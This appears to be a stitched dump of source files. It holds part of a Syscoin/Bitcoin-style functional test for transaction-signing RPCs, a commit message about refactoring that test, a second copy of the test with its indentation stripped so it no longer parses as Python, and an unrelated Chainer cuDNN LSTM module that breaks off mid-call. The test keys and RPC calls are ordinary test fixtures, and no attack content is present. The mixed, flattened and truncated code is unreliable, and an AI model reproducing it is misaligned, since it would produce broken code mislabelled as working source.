        # 1) The transaction has a complete set of signatures
        assert rawTxSigned['complete']
        # 2) No script verification error occurred
        assert 'errors' not in rawTxSigned

    def test_with_lock_outputs(self):
        """Test correct error reporting when trying to sign a locked output"""
        # Encrypting leaves the wallet locked, so signing must fail with -13.
        self.nodes[0].encryptwallet("password")
        rawTx = '020000000156b958f78e3f24e0b2f4e4db1255426b0902027cb37e3ddadb52e37c3557dddb0000000000ffffffff01c0a6b929010000001600149a2ee8c77140a053f36018ac8124a6ececc1668a00000000'
        assert_raises_rpc_error(-13, "Please enter the wallet passphrase with walletpassphrase first", self.nodes[0].signrawtransactionwithwallet, rawTx)

    def script_verification_error_test(self):
        """Create and sign a raw transaction with valid (vin 0), invalid (vin 1) and one missing (vin 2) input script.

        Expected results:

        3) The transaction has no complete set of signatures
        4) Two script verification errors occurred
        5) Script verification errors have certain properties ("txid", "vout", "scriptSig", "sequence", "error")
        6) The verification errors refer to the invalid (vin 1) and missing input (vin 2)"""
        privKeys = ['cUeKHd5orzT3mz8P9pxyREHfsWtVfgsfDjiZZBcjUBAaGk1BTj7N']
        inputs = [
            # Valid pay-to-pubkey script
            {'txid': '9b907ef1e3c26fc71fe4a4b3580bc75264112f95050014157059c736f0202e71', 'vout': 0},
            # Invalid script
            {'txid': '5b8673686910442c644b1f4993d8f7753c7c8fcb5c87ee40d56eaeef25204547', 'vout': 7},
            # Missing scriptPubKey
            {'txid': '9b907ef1e3c26fc71fe4a4b3580bc75264112f95050014157059c736f0202e71', 'vout': 1},
        ]
        scripts = [
            # Valid pay-to-pubkey script
            {'txid': '9b907ef1e3c26fc71fe4a4b3580bc75264112f95050014157059c736f0202e71', 'vout': 0,
             'scriptPubKey': '76a91460baa0f494b38ce3c940dea67f3804dc52d1fb9488ac'},
            # Invalid script
            {'txid': '5b8673686910442c644b1f4993d8f7753c7c8fcb5c87ee40d56eaeef25204547', 'vout': 7,
             'scriptPubKey': 'badbadbadbad'}
        ]
        outputs = {'mpLQjfK79b7CCV4VMJWEWAj5Mpx8Up5zxB': 0.1}
        rawTx = self.nodes[0].createrawtransaction(inputs, outputs)
        # Make sure decoderawtransaction is at least marginally sane
        decodedRawTx = self.nodes[0].decoderawtransaction(rawTx)
        for i, inp in enumerate(inputs):
            assert_equal(decodedRawTx["vin"][i]["txid"], inp["txid"])
            assert_equal(decodedRawTx["vin"][i]["vout"], inp["vout"])
        # Make sure decoderawtransaction throws if there is extra data
        assert_raises_rpc_error(-22, "TX decode failed", self.nodes[0].decoderawtransaction, rawTx + "00")
        rawTxSigned = self.nodes[0].signrawtransactionwithkey(rawTx, privKeys, scripts)
        # 3) The transaction has no complete set of signatures
        assert not rawTxSigned['complete']
        # 4) Two script verification errors occurred
        assert 'errors' in rawTxSigned
        assert_equal(len(rawTxSigned['errors']), 2)
        # 5) Script verification errors have certain properties
        assert 'txid' in rawTxSigned['errors'][0]
        assert 'vout' in rawTxSigned['errors'][0]
        assert 'witness' in rawTxSigned['errors'][0]
        assert 'scriptSig' in rawTxSigned['errors'][0]
        assert 'sequence' in rawTxSigned['errors'][0]
        assert 'error' in rawTxSigned['errors'][0]
        # 6) The verification errors refer to the invalid (vin 1) and missing input (vin 2)
        assert_equal(rawTxSigned['errors'][0]['txid'], inputs[1]['txid'])
        assert_equal(rawTxSigned['errors'][0]['vout'], inputs[1]['vout'])
        assert_equal(rawTxSigned['errors'][1]['txid'], inputs[2]['txid'])
        assert_equal(rawTxSigned['errors'][1]['vout'], inputs[2]['vout'])
        assert not rawTxSigned['errors'][0]['witness']
        # Now test signing failure for transaction with input witnesses
        p2wpkh_raw_tx = "01000000000102fff7f7881a8099afa6940d42d1e7f6362bec38171ea3edf433541db4e4ad969f00000000494830450221008b9d1dc26ba6a9cb62127b02742fa9d754cd3bebf337f7a55d114c8e5cdd30be022040529b194ba3f9281a99f2b1c0a19c0489bc22ede944ccf4ecbab4cc618ef3ed01eeffffffef51e1b804cc89d182d279655c3aa89e815b1b309fe287d9b2b55d57b90ec68a0100000000ffffffff02202cb206000000001976a9148280b37df378db99f66f85c95a783a76ac7a6d5988ac9093510d000000001976a9143bde42dbee7e4dbe6a21b2d50ce2f0167faa815988ac000247304402203609e17b84f6a7d30c80bfa610b5b4542f32a8a0d5447a12fb1366d7f01cc44a0220573a954c4518331561406f90300e8f3358f51928d43c212a8caed02de67eebee0121025476c2e83188368da1ff3e292e7acafcdb3566bb0ad253f62fc70f07aeee635711000000"
        rawTxSigned = self.nodes[0].signrawtransactionwithwallet(p2wpkh_raw_tx)
        # 7) The transaction has no complete set of signatures
        assert not rawTxSigned['complete']
        # 8) Two script verification errors occurred
        assert 'errors' in rawTxSigned
        assert_equal(len(rawTxSigned['errors']), 2)
        # 9) Script verification errors have certain properties
        assert 'txid' in rawTxSigned['errors'][0]
        assert 'vout' in rawTxSigned['errors'][0]
        assert 'witness' in rawTxSigned['errors'][0]
        assert 'scriptSig' in rawTxSigned['errors'][0]
        assert 'sequence' in rawTxSigned['errors'][0]
        assert 'error' in rawTxSigned['errors'][0]
        # Non-empty witness checked here
        assert_equal(rawTxSigned['errors'][1]['witness'], ["304402203609e17b84f6a7d30c80bfa610b5b4542f32a8a0d5447a12fb1366d7f01cc44a0220573a954c4518331561406f90300e8f3358f51928d43c212a8caed02de67eebee01", "025476c2e83188368da1ff3e292e7acafcdb3566bb0ad253f62fc70f07aeee6357"])
        assert not rawTxSigned['errors'][0]['witness']

    def witness_script_test(self):
        """Sign transactions spending P2SH-P2WSH outputs without using the wallet."""
        # Now test signing transaction to P2SH-P2WSH addresses without wallet
        # Create a new P2SH-P2WSH 1-of-1 multisig address:
        embedded_address = self.nodes[1].getaddressinfo(self.nodes[1].getnewaddress())
        embedded_privkey = self.nodes[1].dumpprivkey(embedded_address["address"])
        p2sh_p2wsh_address = self.nodes[1].addmultisigaddress(1, [embedded_address["pubkey"]], "", "p2sh-segwit")
        # send transaction to P2SH-P2WSH 1-of-1 multisig address
        self.nodes[0].generate(101)
        self.nodes[0].sendtoaddress(p2sh_p2wsh_address["address"], 49.999)
        self.nodes[0].generate(1)
        self.sync_all()
        # Find the UTXO for the transaction node[1] should have received, check witnessScript matches
        unspent_output = self.nodes[1].listunspent(0, 999999, [p2sh_p2wsh_address["address"]])[0]
        assert_equal(unspent_output["witnessScript"], p2sh_p2wsh_address["redeemScript"])
        p2sh_redeemScript = CScript([OP_0, sha256(hex_str_to_bytes(p2sh_p2wsh_address["redeemScript"]))])
        assert_equal(unspent_output["redeemScript"], p2sh_redeemScript.hex())
        # Now create and sign a transaction spending that output on node[0], which doesn't know the scripts or keys
        spending_tx = self.nodes[0].createrawtransaction([unspent_output], {self.nodes[1].getnewaddress(): Decimal("49.998")})
        spending_tx_signed = self.nodes[0].signrawtransactionwithkey(spending_tx, [embedded_privkey], [unspent_output])
        # Check the signing completed successfully
        assert 'complete' in spending_tx_signed
        assert_equal(spending_tx_signed['complete'], True)

        self.log.info('Try with a P2PKH script as the witnessScript')
        embedded_addr_info = self.nodes[1].getaddressinfo(self.nodes[1].getnewaddress('', 'legacy'))
        embedded_privkey = self.nodes[1].dumpprivkey(embedded_addr_info['address'])
        witness_script = embedded_addr_info['scriptPubKey']
        redeem_script = CScript([OP_0, sha256(check_script(witness_script))]).hex()
        addr = script_to_p2sh(redeem_script)
        script_pub_key = self.nodes[1].validateaddress(addr)['scriptPubKey']
        # Fund that address
        txid = self.nodes[0].sendtoaddress(addr, 10)
        vout = find_vout_for_address(self.nodes[0], txid, addr)
        self.nodes[0].generate(1)
        # Now create and sign a transaction spending that output on node[0], which doesn't know the scripts or keys
        spending_tx = self.nodes[0].createrawtransaction([{'txid': txid, 'vout': vout}], {self.nodes[1].getnewaddress(): Decimal("9.999")})
        spending_tx_signed = self.nodes[0].signrawtransactionwithkey(spending_tx, [embedded_privkey], [{'txid': txid, 'vout': vout, 'scriptPubKey': script_pub_key, 'redeemScript': redeem_script, 'witnessScript': witness_script, 'amount': 10}])
        # Check the signing completed successfully
        assert 'complete' in spending_tx_signed
        assert_equal(spending_tx_signed['complete'], True)
        self.nodes[0].sendrawtransaction(spending_tx_signed['hex'])

        self.log.info('Try with a P2PK script as the witnessScript')
        embedded_addr_info = self.nodes[1].getaddressinfo(self.nodes[1].getnewaddress('', 'legacy'))
        embedded_privkey = self.nodes[1].dumpprivkey(embedded_addr_info['address'])
        witness_script = CScript([hex_str_to_bytes(embedded_addr_info['pubkey']), OP_CHECKSIG]).hex()
        redeem_script = CScript([OP_0, sha256(check_script(witness_script))]).hex()
        addr = script_to_p2sh(redeem_script)
        script_pub_key = self.nodes[1].validateaddress(addr)['scriptPubKey']
        # Fund that address
        txid = self.nodes[0].sendtoaddress(addr, 10)
        vout = find_vout_for_address(self.nodes[0], txid, addr)
        self.nodes[0].generate(1)
        # Now create and sign a transaction spending that output on node[0], which doesn't know the scripts or keys
        spending_tx = self.nodes[0].createrawtransaction([{'txid': txid, 'vout': vout}], {self.nodes[1].getnewaddress(): Decimal("9.999")})
        spending_tx_signed = self.nodes[0].signrawtransactionwithkey(spending_tx, [embedded_privkey], [{'txid': txid, 'vout': vout, 'scriptPubKey': script_pub_key, 'redeemScript': redeem_script, 'witnessScript': witness_script, 'amount': 10}])
        # Check the signing completed successfully
        assert 'complete' in spending_tx_signed
        assert_equal(spending_tx_signed['complete'], True)
        self.nodes[0].sendrawtransaction(spending_tx_signed['hex'])

    def run_test(self):
        # test_with_lock_outputs runs last: it encrypts node0's wallet, and
        # signrawtransactionwithwallet fails on an encrypted, locked wallet.
        self.successful_signing_test()
        self.script_verification_error_test()
        self.witness_script_test()
        self.test_with_lock_outputs()
# Run the functional test when executed as a script.
if __name__ == '__main__':
    SignRawTransactionsTest().main()
test: refactor rpc_signrawtransaction witness script tests
so that it is clear what is distinct in each test.
Former-commit-id: bfaff9f5b85283d8485fcfd7add5c02d266ab490
#!/usr/bin/env python3
# Copyright (c) 2015-2019 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test transaction signing using the signrawtransaction* RPCs."""
from test_framework.address import check_script, script_to_p2sh
from test_framework.test_framework import SyscoinTestFramework
from test_framework.util import assert_equal, assert_raises_rpc_error, find_vout_for_address, hex_str_to_bytes
from test_framework.messages import sha256
from test_framework.script import CScript, OP_0, OP_CHECKSIG
from decimal import Decimal
class SignRawTransactionsTest(SyscoinTestFramework):
    def set_test_params(self):
        # Two wallet-enabled nodes starting from a clean chain.
        self.setup_clean_chain = True
        self.num_nodes = 2
    def skip_test_if_missing_module(self):
        # Every sub-test relies on wallet RPCs.
        self.skip_if_no_wallet()
    def successful_signing_test(self):
        """Create and sign a valid raw transaction with one input.

        Expected results:

        1) The transaction has a complete set of signatures
        2) No script verification error occurred"""
        privKeys = ['cUeKHd5orzT3mz8P9pxyREHfsWtVfgsfDjiZZBcjUBAaGk1BTj7N', 'cVKpPfVKSJxKqVpE9awvXNWuLHCa5j5tiE7K6zbUSptFpTEtiFrA']
        inputs = [
            # Valid pay-to-pubkey scripts
            {'txid': '9b907ef1e3c26fc71fe4a4b3580bc75264112f95050014157059c736f0202e71', 'vout': 0,
             'scriptPubKey': '76a91460baa0f494b38ce3c940dea67f3804dc52d1fb9488ac'},
            {'txid': '83a4f6a6b73660e13ee6cb3c6063fa3759c50c9b7521d0536022961898f4fb02', 'vout': 0,
             'scriptPubKey': '76a914669b857c03a5ed269d5d85a1ffac9ed5d663072788ac'},
        ]
        outputs = {'mpLQjfK79b7CCV4VMJWEWAj5Mpx8Up5zxB': 0.1}
        rawTx = self.nodes[0].createrawtransaction(inputs, outputs)
        rawTxSigned = self.nodes[0].signrawtransactionwithkey(rawTx, privKeys, inputs)
        # 1) The transaction has a complete set of signatures
        assert rawTxSigned['complete']
        # 2) No script verification error occurred
        assert 'errors' not in rawTxSigned
    def test_with_lock_outputs(self):
        """Test correct error reporting when trying to sign a locked output"""
        # Encrypting leaves the wallet locked, so signing must fail with -13.
        self.nodes[0].encryptwallet("password")
        rawTx = '020000000156b958f78e3f24e0b2f4e4db1255426b0902027cb37e3ddadb52e37c3557dddb0000000000ffffffff01c0a6b929010000001600149a2ee8c77140a053f36018ac8124a6ececc1668a00000000'
        assert_raises_rpc_error(-13, "Please enter the wallet passphrase with walletpassphrase first", self.nodes[0].signrawtransactionwithwallet, rawTx)
def script_verification_error_test(self):
"""Create and sign a raw transaction with valid (vin 0), invalid (vin 1) and one missing (vin 2) input script.
Expected results:
3) The transaction has no complete set of signatures
4) Two script verification errors occurred
5) Script verification errors have certain properties ("txid", "vout", "scriptSig", "sequence", "error")
6) The verification errors refer to the invalid (vin 1) and missing input (vin 2)"""
privKeys = ['cUeKHd5orzT3mz8P9pxyREHfsWtVfgsfDjiZZBcjUBAaGk1BTj7N']
inputs = [
# Valid pay-to-pubkey script
{'txid': '9b907ef1e3c26fc71fe4a4b3580bc75264112f95050014157059c736f0202e71', 'vout': 0},
# Invalid script
{'txid': '5b8673686910442c644b1f4993d8f7753c7c8fcb5c87ee40d56eaeef25204547', 'vout': 7},
# Missing scriptPubKey
{'txid': '9b907ef1e3c26fc71fe4a4b3580bc75264112f95050014157059c736f0202e71', 'vout': 1},
]
scripts = [
# Valid pay-to-pubkey script
{'txid': '9b907ef1e3c26fc71fe4a4b3580bc75264112f95050014157059c736f0202e71', 'vout': 0,
'scriptPubKey': '76a91460baa0f494b38ce3c940dea67f3804dc52d1fb9488ac'},
# Invalid script
{'txid': '5b8673686910442c644b1f4993d8f7753c7c8fcb5c87ee40d56eaeef25204547', 'vout': 7,
'scriptPubKey': 'badbadbadbad'}
]
outputs = {'mpLQjfK79b7CCV4VMJWEWAj5Mpx8Up5zxB': 0.1}
rawTx = self.nodes[0].createrawtransaction(inputs, outputs)
# Make sure decoderawtransaction is at least marginally sane
decodedRawTx = self.nodes[0].decoderawtransaction(rawTx)
for i, inp in enumerate(inputs):
assert_equal(decodedRawTx["vin"][i]["txid"], inp["txid"])
assert_equal(decodedRawTx["vin"][i]["vout"], inp["vout"])
# Make sure decoderawtransaction throws if there is extra data
assert_raises_rpc_error(-22, "TX decode failed", self.nodes[0].decoderawtransaction, rawTx + "00")
rawTxSigned = self.nodes[0].signrawtransactionwithkey(rawTx, privKeys, scripts)
# 3) The transaction has no complete set of signatures
assert not rawTxSigned['complete']
# 4) Two script verification errors occurred
assert 'errors' in rawTxSigned
assert_equal(len(rawTxSigned['errors']), 2)
# 5) Script verification errors have certain properties
assert 'txid' in rawTxSigned['errors'][0]
assert 'vout' in rawTxSigned['errors'][0]
assert 'witness' in rawTxSigned['errors'][0]
assert 'scriptSig' in rawTxSigned['errors'][0]
assert 'sequence' in rawTxSigned['errors'][0]
assert 'error' in rawTxSigned['errors'][0]
# 6) The verification errors refer to the invalid (vin 1) and missing input (vin 2)
assert_equal(rawTxSigned['errors'][0]['txid'], inputs[1]['txid'])
assert_equal(rawTxSigned['errors'][0]['vout'], inputs[1]['vout'])
assert_equal(rawTxSigned['errors'][1]['txid'], inputs[2]['txid'])
assert_equal(rawTxSigned['errors'][1]['vout'], inputs[2]['vout'])
assert not rawTxSigned['errors'][0]['witness']
# Now test signing failure for transaction with input witnesses
p2wpkh_raw_tx = "01000000000102fff7f7881a8099afa6940d42d1e7f6362bec38171ea3edf433541db4e4ad969f00000000494830450221008b9d1dc26ba6a9cb62127b02742fa9d754cd3bebf337f7a55d114c8e5cdd30be022040529b194ba3f9281a99f2b1c0a19c0489bc22ede944ccf4ecbab4cc618ef3ed01eeffffffef51e1b804cc89d182d279655c3aa89e815b1b309fe287d9b2b55d57b90ec68a0100000000ffffffff02202cb206000000001976a9148280b37df378db99f66f85c95a783a76ac7a6d5988ac9093510d000000001976a9143bde42dbee7e4dbe6a21b2d50ce2f0167faa815988ac000247304402203609e17b84f6a7d30c80bfa610b5b4542f32a8a0d5447a12fb1366d7f01cc44a0220573a954c4518331561406f90300e8f3358f51928d43c212a8caed02de67eebee0121025476c2e83188368da1ff3e292e7acafcdb3566bb0ad253f62fc70f07aeee635711000000"
rawTxSigned = self.nodes[0].signrawtransactionwithwallet(p2wpkh_raw_tx)
# 7) The transaction has no complete set of signatures
assert not rawTxSigned['complete']
# 8) Two script verification errors occurred
assert 'errors' in rawTxSigned
assert_equal(len(rawTxSigned['errors']), 2)
# 9) Script verification errors have certain properties
assert 'txid' in rawTxSigned['errors'][0]
assert 'vout' in rawTxSigned['errors'][0]
assert 'witness' in rawTxSigned['errors'][0]
assert 'scriptSig' in rawTxSigned['errors'][0]
assert 'sequence' in rawTxSigned['errors'][0]
assert 'error' in rawTxSigned['errors'][0]
# Non-empty witness checked here
assert_equal(rawTxSigned['errors'][1]['witness'], ["304402203609e17b84f6a7d30c80bfa610b5b4542f32a8a0d5447a12fb1366d7f01cc44a0220573a954c4518331561406f90300e8f3358f51928d43c212a8caed02de67eebee01", "025476c2e83188368da1ff3e292e7acafcdb3566bb0ad253f62fc70f07aeee6357"])
assert not rawTxSigned['errors'][0]['witness']
def witness_script_test(self):
# Now test signing transaction to P2SH-P2WSH addresses without wallet
# Create a new P2SH-P2WSH 1-of-1 multisig address:
embedded_address = self.nodes[1].getaddressinfo(self.nodes[1].getnewaddress())
embedded_privkey = self.nodes[1].dumpprivkey(embedded_address["address"])
p2sh_p2wsh_address = self.nodes[1].addmultisigaddress(1, [embedded_address["pubkey"]], "", "p2sh-segwit")
# send transaction to P2SH-P2WSH 1-of-1 multisig address
self.nodes[0].generate(101)
self.nodes[0].sendtoaddress(p2sh_p2wsh_address["address"], 49.999)
self.nodes[0].generate(1)
self.sync_all()
# Find the UTXO for the transaction node[1] should have received, check witnessScript matches
unspent_output = self.nodes[1].listunspent(0, 999999, [p2sh_p2wsh_address["address"]])[0]
assert_equal(unspent_output["witnessScript"], p2sh_p2wsh_address["redeemScript"])
p2sh_redeemScript = CScript([OP_0, sha256(hex_str_to_bytes(p2sh_p2wsh_address["redeemScript"]))])
assert_equal(unspent_output["redeemScript"], p2sh_redeemScript.hex())
# Now create and sign a transaction spending that output on node[0], which doesn't know the scripts or keys
spending_tx = self.nodes[0].createrawtransaction([unspent_output], {self.nodes[1].getnewaddress(): Decimal("49.998")})
spending_tx_signed = self.nodes[0].signrawtransactionwithkey(spending_tx, [embedded_privkey], [unspent_output])
# Check the signing completed successfully
assert 'complete' in spending_tx_signed
assert_equal(spending_tx_signed['complete'], True)
# Now test with P2PKH and P2PK scripts as the witnessScript
for tx_type in ['P2PKH', 'P2PK']: # these tests are order-independent
self.verify_txn_with_witness_script(tx_type)
def verify_txn_with_witness_script(self, tx_type):
self.log.info("Test with a {} script as the witnessScript".format(tx_type))
embedded_addr_info = self.nodes[1].getaddressinfo(self.nodes[1].getnewaddress('', 'legacy'))
embedded_privkey = self.nodes[1].dumpprivkey(embedded_addr_info['address'])
witness_script = {
'P2PKH': embedded_addr_info['scriptPubKey'],
'P2PK': CScript([hex_str_to_bytes(embedded_addr_info['pubkey']), OP_CHECKSIG]).hex()
}.get(tx_type, "Invalid tx_type")
redeem_script = CScript([OP_0, sha256(check_script(witness_script))]).hex()
addr = script_to_p2sh(redeem_script)
script_pub_key = self.nodes[1].validateaddress(addr)['scriptPubKey']
# Fund that address
txid = self.nodes[0].sendtoaddress(addr, 10)
vout = find_vout_for_address(self.nodes[0], txid, addr)
self.nodes[0].generate(1)
# Now create and sign a transaction spending that output on node[0], which doesn't know the scripts or keys
spending_tx = self.nodes[0].createrawtransaction([{'txid': txid, 'vout': vout}], {self.nodes[1].getnewaddress(): Decimal("9.999")})
spending_tx_signed = self.nodes[0].signrawtransactionwithkey(spending_tx, [embedded_privkey], [{'txid': txid, 'vout': vout, 'scriptPubKey': script_pub_key, 'redeemScript': redeem_script, 'witnessScript': witness_script, 'amount': 10}])
# Check the signing completed successfully
assert 'complete' in spending_tx_signed
assert_equal(spending_tx_signed['complete'], True)
self.nodes[0].sendrawtransaction(spending_tx_signed['hex'])
def run_test(self):
self.successful_signing_test()
self.script_verification_error_test()
self.witness_script_test()
self.test_with_lock_outputs()
# Standard functional-test entry point.
if __name__ == '__main__':
    SignRawTransactionsTest().main()
|
import numpy
from chainer import cuda
from chainer import function
from chainer.utils import type_check
# Alias the cuDNN wrappers only when CUDA reports cuDNN support; the
# functions below assume these names exist when they are called.
if cuda.cudnn_enabled:
    cudnn = cuda.cudnn
    libcudnn = cuda.cudnn.cudnn
class PointerArray(object):

    """A C-compatible array of raw pointers.

    Pointer values are stored as ``numpy.intp``; a reference to the
    objects owning the pointed-to memory is retained so the pointers
    remain valid for this object's lifetime.
    """

    def __init__(self, lst, back_pointer):
        self._pointers = numpy.array(lst, dtype=numpy.intp)
        # Keep a reference so the GC cannot collect the originals.
        self._keepalive = back_pointer

    @property
    def data(self):
        # Address of the first element, suitable for passing to C APIs.
        return self._pointers.ctypes.data
def _make_tensor_descriptor_array(xs, rev=True):
    """Make an array of pointers denoting pointers of tensor descriptors.

    Arrays with fewer than three dimensions are reshaped to 3-D by padding
    with size-1 axes: prepended when ``rev`` is true, appended otherwise.
    """
    descs = []
    for x in xs:
        if x.ndim < 3:
            if rev:
                shape = (1,) * (3 - x.ndim) + x.shape
            else:
                shape = x.shape + (1,) * (3 - x.ndim)
            x = x.reshape(shape)
        # NOTE(review): ``rev=True`` is hard-coded here although the
        # function accepts a ``rev`` parameter -- confirm whether this
        # should be ``rev=rev``.
        desc = cudnn.create_tensor_nd_descriptor(x, rev=True)
        descs.append(desc)
    # The descriptor objects are kept alive through the back pointer;
    # only their raw values go into the pointer array.
    return PointerArray([d.value for d in descs], descs)
def _make_ptr_array(xs):
    """Make an array of pointers denoting pointers of ndarrays.

    Each element of ``xs`` must expose ``.data.ptr`` (presumably cupy
    arrays -- verify against callers).
    """
    return PointerArray([x.data.ptr for x in xs], xs)
class DropoutStates(object):
    """Bundle of a cuDNN dropout state buffer and its descriptor."""
    def __init__(self, states, desc):
        self.states = states
        self.desc = desc
    @staticmethod
    def create(handle, dropout, seed):
        # Allocate a fresh state buffer and build a descriptor over it.
        states = cudnn.create_dropout_states(handle)
        desc = cudnn.create_dropout_descriptor(
            handle, dropout, states.data.ptr, states.size, seed)
        return DropoutStates(states, desc)
    @staticmethod
    def from_states(handle, states, dropout):
        # Reuse an existing state buffer; the descriptor is created
        # without attaching a buffer (ptr/size/seed all zero).
        desc = cudnn.create_dropout_descriptor(handle, dropout, 0, 0, 0)
        return DropoutStates(states, desc)
def _make_indices(batches):
pos = 0
inds = []
for b in batches[:-1]:
pos += b
inds.append(pos)
return inds
class NStepLSTM(function.Function):

    """Multi-layer unidirectional LSTM over a packed sequence via cuDNN.

    ``batches`` holds the mini-batch size of each time step of the packed
    input; ``states`` is a :class:`DropoutStates` applied between layers.

    Fix: removed a debug-only ``cuda.to_cpu(hy)`` that forced a
    synchronous device-to-host copy (whose result was discarded) right
    before returning from ``forward``.
    """

    def __init__(self, n_layers, batches, states, train=True):
        self.n_layers = n_layers
        self.train = train
        self.states = states
        self.batches = batches

    def check_type_forward(self, in_types):
        # Inputs: hidden state, cell state, packed input, weights, biases.
        h_type, c_type, x_type, w_type, b_type = in_types
        type_check.expect(
            h_type.dtype == numpy.float32,
            c_type.dtype == numpy.float32,
            x_type.dtype == numpy.float32,
            h_type.ndim == 3,
            h_type.shape[0] == self.n_layers,
            c_type.ndim == 3,
            c_type.shape[0] == self.n_layers,
            x_type.shape[0] == sum(self.batches),
            # mini-batch size
            h_type.shape[1] == c_type.shape[1],
            # hidden size
            h_type.shape[2] == c_type.shape[2],
            h_type.shape[2] == x_type.shape[1],
            # cuDNN's LSTM has eight linear layers (weights and biases)
            # per stacked layer.
            w_type.ndim == 4,
            w_type.shape[0] == self.n_layers,
            w_type.shape[1] == 8,
            h_type.shape[2] == w_type.shape[2],
            h_type.shape[2] == w_type.shape[3],
            b_type.ndim == 3,
            b_type.shape[0] == self.n_layers,
            b_type.shape[1] == 8,
            h_type.shape[2] == b_type.shape[2],
        )

    def forward(self, inputs):
        hx, cx, xs, ws, bs = inputs
        length = len(self.batches)
        n_units = hx.shape[2]
        ys = cuda.cupy.empty_like(xs)
        # Split the packed input into per-time-step chunks.
        inds = _make_indices(self.batches)
        x_list = cuda.cupy.split(xs, inds, 0)
        # shape of h and c is (batch_size, n_layer, hidden_size) in Chainer
        # but (hidden_size, batch_size, n_layer) in cuDNN
        handle = cudnn.get_handle()
        self.handle = handle
        rnn_desc = cudnn.create_rnn_descriptor(
            n_units, length, self.n_layers, self.states.desc,
            libcudnn.CUDNN_LINEAR_INPUT, libcudnn.CUDNN_UNIDIRECTIONAL,
            libcudnn.CUDNN_LSTM, libcudnn.CUDNN_DATA_FLOAT)
        self.rnn_desc = rnn_desc
        c_x_descs = _make_tensor_descriptor_array(x_list)
        hx_desc = cudnn.create_tensor_nd_descriptor(hx, rev=True)
        cx_desc = cudnn.create_tensor_nd_descriptor(cx, rev=True)
        # Copy the per-layer weights/biases into cuDNN's opaque parameter
        # blob (params size is in bytes; float32 is 4 bytes per element).
        weights_size = libcudnn.getRNNParamsSize(
            handle, rnn_desc.value, c_x_descs.data)
        w = cuda.cupy.empty((weights_size // 4, 1, 1), dtype=numpy.float32)
        w_desc = cudnn.create_filter_descriptor(w)
        for layer in range(self.n_layers):
            for lin_layer_id in range(8):
                mat = cudnn.get_rnn_lin_layer_matrix_params(
                    handle, rnn_desc, layer, c_x_descs, w_desc, w,
                    lin_layer_id)
                m = mat.reshape(mat.size)
                m[...] = ws[layer, lin_layer_id].ravel()
                bias = cudnn.get_rnn_lin_layer_bias_params(
                    handle, rnn_desc, layer, c_x_descs, w_desc, w,
                    lin_layer_id)
                b = bias.reshape(bias.size)
                b[...] = bs[layer, lin_layer_id]
        self.w = w
        self.w_desc = w_desc
        y_list = cuda.cupy.split(ys, inds, 0)
        c_y_descs = _make_tensor_descriptor_array(y_list)
        hy = cuda.cupy.empty_like(hx)
        cy = cuda.cupy.empty_like(cx)
        hy_desc = cudnn.create_tensor_nd_descriptor(hy, rev=True)
        cy_desc = cudnn.create_tensor_nd_descriptor(cy, rev=True)
        work_size = libcudnn.getRNNWorkspaceSize(
            handle, rnn_desc.value, c_x_descs.data)
        workspace = cuda.cupy.empty((work_size,), dtype='b')
        self.workspace = workspace
        if not self.train:
            libcudnn.RNNForwardInference(
                handle, rnn_desc.value,
                c_x_descs.data, xs.data.ptr, hx_desc.value, hx.data.ptr,
                cx_desc.value, cx.data.ptr, w_desc.value, w.data.ptr,
                c_y_descs.data, ys.data.ptr, hy_desc.value, hy.data.ptr,
                cy_desc.value, cy.data.ptr, workspace.data.ptr, work_size)
        else:
            # Training keeps a reserve buffer carrying intermediate
            # results over to the backward pass.
            reserve_size = libcudnn.getRNNTrainingReserveSize(
                handle, rnn_desc.value, c_x_descs.data)
            self.reserve_space = cuda.cupy.empty((reserve_size,), dtype='b')
            libcudnn.RNNForwardTraining(
                handle, rnn_desc.value,
                c_x_descs.data, xs.data.ptr, hx_desc.value, hx.data.ptr,
                cx_desc.value, cx.data.ptr, w_desc.value, w.data.ptr,
                c_y_descs.data, ys.data.ptr, hy_desc.value, hy.data.ptr,
                cy_desc.value, cy.data.ptr,
                workspace.data.ptr, work_size,
                self.reserve_space.data.ptr, reserve_size)
        # Keep descriptors and outputs alive for backward().
        self.c_y_descs = c_y_descs
        self.ys = ys
        self.c_x_descs = c_x_descs
        return hy, cy, ys

    def backward(self, inputs, grads):
        hx, cx, xs, ws, bs = inputs
        dhy, dcy, dys = grads
        # Missing upstream gradients are treated as zeros.
        if dhy is None:
            dhy = cuda.cupy.zeros_like(hx)
        if dcy is None:
            dcy = cuda.cupy.zeros_like(cx)
        if dys is None:
            #TODO
            dys = cuda.cupy.zeros_like(xs)
        inds = _make_indices(self.batches)
        dxs = cuda.cupy.empty_like(xs)
        dhx = cuda.cupy.empty_like(hx)
        dcx = cuda.cupy.empty_like(cx)
        hx_desc = cudnn.create_tensor_nd_descriptor(hx, rev=True)
        cx_desc = cudnn.create_tensor_nd_descriptor(cx, rev=True)
        dhy_desc = cudnn.create_tensor_nd_descriptor(dhy, rev=True)
        dcy_desc = cudnn.create_tensor_nd_descriptor(dcy, rev=True)
        dy_list = cuda.cupy.split(dys, inds, 0)
        c_dy_descs = _make_tensor_descriptor_array(dy_list)
        rnn_desc = self.rnn_desc
        handle = self.handle
        work_size = libcudnn.getRNNWorkspaceSize(
            handle, rnn_desc.value, self.c_x_descs.data)
        workspace = cuda.cupy.empty((work_size,), dtype='b')
        dhx_desc = cudnn.create_tensor_nd_descriptor(dhx, rev=True)
        dcx_desc = cudnn.create_tensor_nd_descriptor(dcx, rev=True)
        dx_list = cuda.cupy.split(dxs, inds, 0)
        c_dx_descs = _make_tensor_descriptor_array(dx_list)
        # Gradients w.r.t. inputs and initial states.
        libcudnn.RNNBackwardData(
            handle, rnn_desc.value, self.c_y_descs.data, self.ys.data.ptr,
            c_dy_descs.data, dys.data.ptr, dhy_desc.value, dhy.data.ptr,
            dcy_desc.value, dcy.data.ptr, self.w_desc.value, self.w.data.ptr,
            hx_desc.value, hx.data.ptr, cx_desc.value, cx.data.ptr,
            c_dx_descs.data, dxs.data.ptr, dhx_desc.value, dhx.data.ptr,
            dcx_desc.value, dcx.data.ptr, workspace.data.ptr, work_size,
            self.reserve_space.data.ptr, self.reserve_space.size)
        # Weight gradients are accumulated into dw, hence zeros_like.
        dw = cuda.cupy.zeros_like(self.w)
        dw_desc = cudnn.create_tensor_nd_descriptor(dw)
        libcudnn.RNNBackwardWeights(
            handle, rnn_desc.value, self.c_x_descs.data, xs.data.ptr,
            hx_desc.value, hx.data.ptr, self.c_y_descs.data, self.ys.data.ptr,
